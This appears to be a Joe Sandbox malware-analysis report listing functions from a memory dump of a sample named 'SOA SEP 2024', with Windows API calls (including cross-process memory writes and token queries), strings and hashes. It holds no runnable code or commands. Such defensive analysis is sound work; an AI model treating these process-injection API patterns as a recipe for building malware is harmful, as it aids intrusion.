Opcode Fuzzy Hash: ee3dbf24f71b30afa92da33a463b5661ced758a8fb7cba736fc4149d00dec162
Instruction Fuzzy Hash: 5A018170202244BFDF208FA9EC88D6B3BADEF8A3547104429F405CB250D675CC40CBB4

Function 007A7A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007A7A74
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 007A7A82
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007A7A8A
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 007A7A94
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007A7AD0

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: b57a132df61388234bbcf995892c0c78057e058dcb560b05ef7aba526518a395
Instruction ID: a1defb9c83a1778cd2ea30b7b0f8f6ae230d2f9fde27b9f6f5edfa6b68802d9e
Opcode Fuzzy Hash: b57a132df61388234bbcf995892c0c78057e058dcb560b05ef7aba526518a395
Instruction Fuzzy Hash: 1E015731D0661DEBCF14AFE8DC88ADDBB78FB4D311F018545E502B2250DB389A50C7A5

Function 00799ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32 ref: 00799ADC
ProgIDFromCLSID.OLE32(?,00000000), ref: 00799AF7
lstrcmpiW.KERNEL32(?,00000000), ref: 00799B05
CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00799B15
CLSIDFromString.OLE32(?,?), ref: 00799B21

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 69732e3638339aa6d26244d63fc27f0a87ebec562158c8d241c3455aec866c17
Instruction ID: 9eff986d3fa64dd0ead9c64ecad760709a38448fa7c4ddb92cd4daa5339198d9
Opcode Fuzzy Hash: 69732e3638339aa6d26244d63fc27f0a87ebec562158c8d241c3455aec866c17
Instruction Fuzzy Hash: 70014FB6601215FFEB214F58ED84B9E7BEDEB48752F148028FA09D6210D77DDD409BA0

Function 0079AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0079AA79
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0079AA83
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0079AA92
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0079AA99
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0079AAAF

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: c477b902637eed2f4c13ac228911e9b8bb198cfc7991304366ade475a4c670ae
Instruction ID: 236cde5022039a24680fe79b9e40b11ebf42730feb4304d0bc2ebf31b2c78200
Opcode Fuzzy Hash: c477b902637eed2f4c13ac228911e9b8bb198cfc7991304366ade475a4c670ae
Instruction Fuzzy Hash: 95F04F71202344BFEB215FA5AC89E773BACFF4D754F048419F941CB190DA789C41CAA1

Function 0079AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0079AADA
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0079AAE4
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0079AAF3
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0079AAFA
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0079AB10

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 10bdc0daa409b9314c217e3ceaded2b9b9bee7e0355791dd444be6536bb12574
Instruction ID: 806e79f5efdc0f9895f6ffed8d9d76cadcb01c011e6bf1ebf62136c6c38d2411
Opcode Fuzzy Hash: 10bdc0daa409b9314c217e3ceaded2b9b9bee7e0355791dd444be6536bb12574
Instruction Fuzzy Hash: D7F04F71202248BFEB215FA4ECC8E773B6EFF49754F004029F941CB190CA789D018AA1

Function 0079EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0079EC94
GetWindowTextW.USER32(00000000,?,00000100), ref: 0079ECAB
MessageBeep.USER32(00000000), ref: 0079ECC3
KillTimer.USER32(?,0000040A), ref: 0079ECDF
EndDialog.USER32(?,00000001), ref: 0079ECF9

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 1eb8586688adb26271c38f367d79adb2bf5caf224caa9f5aa318415b81b6d458
Instruction ID: 170ae27b1c25cf4eab73aa54a9d76a0e30702a029661ee226c8190b614dc0dc8
Opcode Fuzzy Hash: 1eb8586688adb26271c38f367d79adb2bf5caf224caa9f5aa318415b81b6d458
Instruction Fuzzy Hash: 12018130500744ABEF349B50EE9EB9677B8FB05705F008959B583A54E0DBF8AE94CB54

Function 0077B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 0077B0BA
StrokeAndFillPath.GDI32(?,?,007DE680,00000000,?,?,?), ref: 0077B0D6
SelectObject.GDI32(?,00000000), ref: 0077B0E9
DeleteObject.GDI32 ref: 0077B0FC
StrokePath.GDI32(?), ref: 0077B117

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 04fbeecac76542d549464f22f14b7a5216f10297f4274414fd64ca0fc2f36ef1
Instruction ID: 5b3892be673fcebb25c4f18cd1068c2dce7f1ce272010d287831824d4a86c40d
Opcode Fuzzy Hash: 04fbeecac76542d549464f22f14b7a5216f10297f4274414fd64ca0fc2f36ef1
Instruction Fuzzy Hash: 09F0B63000524CAFDF319F65EC4DB593B65B7643A6FA8C315E429490F0C7398966DF54

Function 007AF23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 007AF2DA
CoCreateInstance.OLE32(007EDA7C,00000000,00000001,007ED8EC,?), ref: 007AF2F2
CoUninitialize.OLE32 ref: 007AF555

Strings

.lnk, xrefs: 007AF28B, 007AF290, 007AF29E

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: .lnk
API String ID: 948891078-24824748
Opcode ID: ef942700517f2c7855213c1323996859ceac5ecc4d1ad3af2d3c20bc041cddcf
Instruction ID: cb9f9f248ba6899c501bd97c7a7410d6de1826e066ff143ab7e7e8c70bf70f11
Opcode Fuzzy Hash: ef942700517f2c7855213c1323996859ceac5ecc4d1ad3af2d3c20bc041cddcf
Instruction Fuzzy Hash: 78A14DB1104201EFD701EF54C885DABB7ECEF98714F00491DF59A97192DB75EA09CBA2

Function 007AE7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 0076660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007653B1,?,?,007661FF,?,00000000,00000001,00000000), ref: 0076662F

CoInitialize.OLE32(00000000), ref: 007AE85D
CoCreateInstance.OLE32(007EDA7C,00000000,00000001,007ED8EC,?), ref: 007AE876
CoUninitialize.OLE32 ref: 007AE893

Part of subcall function 0076936C: __swprintf.LIBCMT ref: 007693AB
Part of subcall function 0076936C: __itow.LIBCMT ref: 007693DF

Strings

.lnk, xrefs: 007AE83B, 007AE84D

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: fb1648584316ca04d89b1da66270e51125aed95b953cee670256c3f82ce0adf2
Instruction ID: 3583bb30497de921648594425868ace0bfde4df45733479b92e0bf96b97f80c4
Opcode Fuzzy Hash: fb1648584316ca04d89b1da66270e51125aed95b953cee670256c3f82ce0adf2
Instruction Fuzzy Hash: F3A14775604301DFCB14DF14C88896ABBE5FF89310F058A58F99A9B3A1CB39EC45CB92

Function 0078325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 007832ED

Part of subcall function 0078E0D0: __87except.LIBCMT ref: 0078E10B

Strings

pow, xrefs: 007832C5, 007832E2

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: a695b7eda5edc6a77b83a4c3f009e98c1f1663780d4bb173f9549d03245b4cb2
Instruction ID: 5dd6161d02fddadc97424db911f50141d51e673bbc1dfd9fe2972c8211197d57
Opcode Fuzzy Hash: a695b7eda5edc6a77b83a4c3f009e98c1f1663780d4bb173f9549d03245b4cb2
Instruction Fuzzy Hash: 9F513831E89605D6CB15B71CC94937A2B98BB40B20F308D68F4D5825EAEF7C8EC5DB46

Function 007A4606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,007FDC50,?,0000000F,0000000C,00000016,007FDC50,?), ref: 007A4645

Part of subcall function 0076936C: __swprintf.LIBCMT ref: 007693AB
Part of subcall function 0076936C: __itow.LIBCMT ref: 007693DF

CharUpperBuffW.USER32(?,?,00000000,?), ref: 007A46C5

Strings

REMOVE, xrefs: 007A4676
THIS, xrefs: 007A4703

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: BuffCharUpper$__itow__swprintf
String ID: REMOVE$THIS
API String ID: 3797816924-776492005
Opcode ID: d338f6cad7deac7119fe11e379d7251e6e76426fcaf390b848b19749a2a5d7de
Instruction ID: 6bd6eb19a315599da2de0e017decdc12aef4d24ca497b75ec3c19c23fe399331
Opcode Fuzzy Hash: d338f6cad7deac7119fe11e379d7251e6e76426fcaf390b848b19749a2a5d7de
Instruction Fuzzy Hash: 92418134A00249DFCF01DFA4C885AADB7B9FFCA304F148159E916AB292DB79DD45CB50

Function 0079C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007A430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0079BC08,?,?,00000034,00000800,?,00000034), ref: 007A4335

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0079C1D3

Part of subcall function 007A42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0079BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 007A4300

Part of subcall function 007A422F: GetWindowThreadProcessId.USER32(?,?), ref: 007A425A
Part of subcall function 007A422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0079BBCC,00000034,?,?,00001004,00000000,00000000), ref: 007A426A
Part of subcall function 007A422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0079BBCC,00000034,?,?,00001004,00000000,00000000), ref: 007A4280

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0079C240
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0079C28D

Strings

@, xrefs: 0079C2A5

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 23ff9106da0d4e0cf924ab9101276857724485c2969df39214b27ece2940b74e
Instruction ID: 532b2e0ad4c0474fcdbcfb723fa000983bf778ac2f6709885a4b8f817e749061
Opcode Fuzzy Hash: 23ff9106da0d4e0cf924ab9101276857724485c2969df39214b27ece2940b74e
Instruction Fuzzy Hash: 3B414A72900218AFDF11DFA4CD85AEEB7B8FF8A300F004195FA45B7181DA756E45CB61

Function 007CA63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,007FDC00,00000000,?,?,?,?), ref: 007CA6D8
GetWindowLongW.USER32 ref: 007CA6F5
SetWindowLongW.USER32(?,000000F0,00000000), ref: 007CA705

Strings

SysTreeView32, xrefs: 007CA6AA

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: d33fb3c879fc1d32b50e8b483063ae189298ed4a5364966a3005eabde9c20d15
Instruction ID: 261c3381c59c5f64679db8fe062b9b0916f60d6561d74225d59249ba915c3f39
Opcode Fuzzy Hash: d33fb3c879fc1d32b50e8b483063ae189298ed4a5364966a3005eabde9c20d15
Instruction Fuzzy Hash: 58319D31601209AFDF218E34CC45FEA77A9FB49368F244729F975A32E0C738AC509B50

Function 007B5180 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007B5190
InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 007B51C6

Strings

|, xrefs: 007B51B5
D{, xrefs: 007B522E

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |$D{
API String ID: 1413715105-1531470645
Opcode ID: 5b51a4a1cc56010c19f0c7805dd475da2b8ec052a08c017e72b73b56e916c13f
Instruction ID: c58fb6b2f77cc98ad4cfbb552dc0828152346b7ce24818e3008508d3ee803829
Opcode Fuzzy Hash: 5b51a4a1cc56010c19f0c7805dd475da2b8ec052a08c017e72b73b56e916c13f
Instruction Fuzzy Hash: 5E311971C01119EFCF01AFA4CC89AEE7FB9FF18700F004015EC15AA166DA35A946CBA0

Function 007CA0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007CA15E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007CA172
SendMessageW.USER32(?,00001002,00000000,?), ref: 007CA196

Strings

SysMonthCal32, xrefs: 007CA129

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: df28cb9fd8343aa0ee9097f2d15692ed11990f198b81e712a231d63052b5c17c
Instruction ID: ed02e9ec15f110558bf91830cffecea13d16df7c268d198f03dd79d048638fb3
Opcode Fuzzy Hash: df28cb9fd8343aa0ee9097f2d15692ed11990f198b81e712a231d63052b5c17c
Instruction Fuzzy Hash: 0E217C3251021CBBDF258E94CC86FEA3B79EF48764F150218FA55AB1D0D6B9AC51CBA0

Function 007CA88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 007CA941
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 007CA94F
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 007CA956

Strings

msctls_updown32, xrefs: 007CA8BB

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 650b561e62e3dbd0fcc7e7c28135282976aeac35ceaf01f29ae36222d046bdc3
Instruction ID: c90af7227c852c93b741b0c7155d39bdd2de200f8981a047b912239cc3848c7a
Opcode Fuzzy Hash: 650b561e62e3dbd0fcc7e7c28135282976aeac35ceaf01f29ae36222d046bdc3
Instruction Fuzzy Hash: FF21A1B5600209BFDB10DF64CC86E6B37ADEF5A3A8B15015DFA049B351CB34EC128B61

Function 007C99A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007C9A30
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007C9A40
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007C9A65

Strings

Listbox, xrefs: 007C99FD

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: fe1cc1bdd56a2747b7e9a12bb74812148e5b9cd5a462553e5059347b04bdb2a7
Instruction ID: 41fd927af3015ad19502f0ba1214ca8cad8e44a11db3719245dc6a9ee3f6f91c
Opcode Fuzzy Hash: fe1cc1bdd56a2747b7e9a12bb74812148e5b9cd5a462553e5059347b04bdb2a7
Instruction Fuzzy Hash: A6217132610118BFDF218F54CC89FAF3BAAEF89760F11812DFA549B190C675AC51C7A0

Function 007CA409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007CA46D
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007CA482
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007CA48F

Strings

msctls_trackbar32, xrefs: 007CA444

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
